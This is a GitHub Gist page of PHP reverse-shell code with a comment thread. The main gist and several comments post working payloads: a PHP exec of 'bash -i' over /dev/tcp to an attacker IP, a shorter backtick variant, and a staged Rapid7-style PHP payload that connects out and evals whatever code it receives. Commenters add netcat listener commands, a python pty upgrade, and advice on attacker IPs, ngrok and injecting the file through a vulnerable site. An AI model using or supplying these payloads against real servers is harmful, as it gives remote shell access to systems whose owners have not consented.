-
-
Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
| <?php | |
| exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
This shell was writing duplicate input when using a netcat listener.
removing the ampersand (&) solved my problem.
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");
note for anybody coming across this for whatever reason: i have zero tolerance for inappropriate comments on this or any project i control. be kind, or leave.
Is the ip my physical or public ip?
If you want to connect to your computer within an intranet, or by VPN, then is the physical IP
(for example if you are 192.168.1.2 and you want 192.168.1.3 to connect to you, you must usa 192.168.1.2)
If you want a machine in the internet to connect with you, it should be the public one, and you may configure port forwarding in your router configuration.
(So you open your local port, 192.168.1.2:1337 , you configure your firewall and router to allow connections from your public address, for example 10.10.10.2:1337 and forward them to your computer, then from another computer on the internet you must use 10.10.10.2:1337)
Thanks for the comment If I understand you correctly,
Here is my steps what I did,
- I use ngrok to publicly access my local site on the internet
- I start the nc in my terminal
nc -nvlp 8080 - from the php script I use my physical ip then 8080
- I inject that remote url from a vuln site.
- the nc is now connected to that but the problem is that when I do commands it is on the webserver where I host my remote url
So what I want to achieve is access the vuln site using the reverse shell, I am still a beginner so forgive for that. is that possible?
thank you so much.
I had to search what was ngrok.
So ngrok makes a localhost port public, like localhost:3000->publicweb.ngrok.io, so at this point you have something like a public subdomain and a public ip that forwards the connections to your localhost.
So when you execute the php script, it runs on the server that hosts the file (localhost) and tries to connect to the desired ip.
If your ip is in the same network as the server, (or your routing table is configured to forward to another network) the server tries to make the connection serverip->yourcomputerip:8080
So the php is being executed in your server, not in another site. The file needs to be executed from the server that you want to conect to, so that the php in that system executes the bash command.
So if that other server (remote url) executes that php( you upload the file and open the url) , you would need a public IP, because that server is on the internet and cannot find your physical ip. In this case you would need a public Ip.
I hope this helps. Ask me if there is something that you dont understand.
I'm writing this on my phone and is a bit difficult to structure the text.
Thanks you so much for the reply. I'll try again about the public IP.
This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
it was bash not a php
it was bash not a php
@Cvar1984
It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port.
Then you can connect to that IP/port and get access to this bash shell.
The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.
it was bash not a php
@Cvar1984It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.
Yea i know it spawn bash using php system call
Then this is the tiniest
<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>
it was bash not a php
@Cvar1984It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.
Yea i know it spawn bash using php system call
Yes but the solution from rapid7 works on any operating system because it does not utilize any system calls.
eu não sei qual ip usar, alguém me ajuda por gentileza !
estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !
estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !
- You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network, if you are in a VPN , both machines must be in that network, and those are the important IPs )
- You have to open a listening port in your attacking machine, (nc -nvlp 1234)
- You have to open a reverse shell, and point it to your attacking machine (VPN IP and open listening port)
And thats all.
@SergioChicoITCL muito obrigado campeão ! você é demais !
python -c 'import pty; pty.spawn("/bin/bash")'